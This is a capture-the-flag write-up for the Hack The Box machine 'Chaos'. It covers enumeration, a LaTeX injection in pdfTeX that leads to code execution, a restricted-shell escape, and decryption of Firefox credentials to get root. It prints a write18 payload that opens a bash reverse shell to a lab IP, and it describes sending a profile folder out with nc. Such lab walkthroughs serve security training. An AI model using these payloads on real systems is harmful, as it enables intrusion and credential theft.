search

Chaos

hashtag
Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 10.129.253.192                
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 13:03 +08
Nmap scan report for 10.129.253.192
Host is up (0.0076s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
110/tcp   open  pop3
143/tcp   open  imap
993/tcp   open  imaps
995/tcp   open  pop3s
10000/tcp open  snet-sensor-mgmt

Mail ports and Webmin on port 10000 is open. Might need to read messages for credentials later. Did a detailed scan too:

$ nmap -p 80,110,143,993,995,10000 -sC -sV --min-rate 5000 chaos.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 13:06 +08
Nmap scan report for chaos.htb (10.129.253.192)
Host is up (0.0061s latency).

PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Chaos
|_http-server-header: Apache/2.4.34 (Ubuntu)
110/tcp   open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: PIPELINING TOP UIDL SASL AUTH-RESP-CODE STLS RESP-CODES CAPA
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_imap-capabilities: have LOGINDISABLEDA0001 IDLE Pre-login more LITERAL+ post-login ENABLE capabilities listed ID LOGIN-REFERRALS IMAP4rev1 STARTTLS OK SASL-IR
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: have IDLE AUTH=PLAINA0001 more LITERAL+ post-login ENABLE capabilities listed ID LOGIN-REFERRALS IMAP4rev1 Pre-login OK SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) AUTH-RESP-CODE USER RESP-CODES CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I added chaos.htb to my /etc/hosts file since there's a DNS name returned from the above scan.

hashtag
Web Enum -> Mail Creds

Visiting the IP address alone blocks us:

Visiting chaos.htb shows us a typical security company page:

The website looked rather static, so I did a gobuster directory and wfuzz subdomain scan. The gobuster scan returned nothing of interest, while the wfuzz scan did return a webmail subdomain.

I also did a gobuster scan with the IP address of the machine as the URL, and found a Wordpress site:

The Wordpress site was rather simple as well, and just contained one locked article:

I didn't have a password yet, so I ran a wpscan on the URL and found one user named human:

Using human as the password worked, and we could see the post:

Now, we can add the webmail subdomain to the /etc/hosts file and enumerate that next. When visited, it just shows a typical Roundcube login page:

Using the credentials we found earlier, we can login to view the dashboard:

hashtag
Webmail Files -> Hidden URL

Within the Drafts of the user, I found one message with 2 files called enim_msg.txt and en.py:

Here's the contents of the Python script:

The enim_msg.txt file was encrypted:

The message says that You are the password XD, meaning that sahay is the AES key used. The encryption sc ript writes the file size as the first 16 bytes, and then the next 16 bytes is the IV used. The key used is the SHA256 hash of sahay.

Using this, we can construct a quyick decryptor:

This would output a base64 encoded string, and when decoded it reveals a hidden URL:

hashtag
PDF -> RCE

The URL shows a PDF maker thing:

Sending requests doesn't seem to do anything, so I took a look at it within Burpsuite:

The above reveals that it is running an outdated version of pdfTeX. There are multiple methods of which we can use LaTeX injection to get RCE:

LogoPage not found - HackTricksbook.hacktricks.xyzchevron-right

I used \immediate\write18\{id} to test, and it worked:

Using \immediate\write18{bash -c 'bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'} will get us a reverse shell:

hashtag
Privilege Escalation

hashtag
Ayush Shell -> Shell Escape

There are 2 users present within the machine:

ayush uses the same password of jiujitsu.

ayush has a restricted shell.

Using the TAB button, we can find the commands we can run:

I noticed that ayush can run tar, which allows us to escape the shell using:

hashtag
Mozilla Creds -> Root

The ayush user has a .mozilla folder present in their home directory:

This could mean that there are Firefox credentials cached within the machine. We can use this repository to decrypt the passwords within:

LogoGitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHubchevron-right

To use it, we need to zip up the entire .mozilla folder and transfer it to our machine via nc:

Then, we can extract the files and use jiujitsu again to decrypt the root password:

Then, su to root!

Interestingly, these are credentials for the Webmin instance present on the machine.

PreviousCatchNextChatterbox

Last updated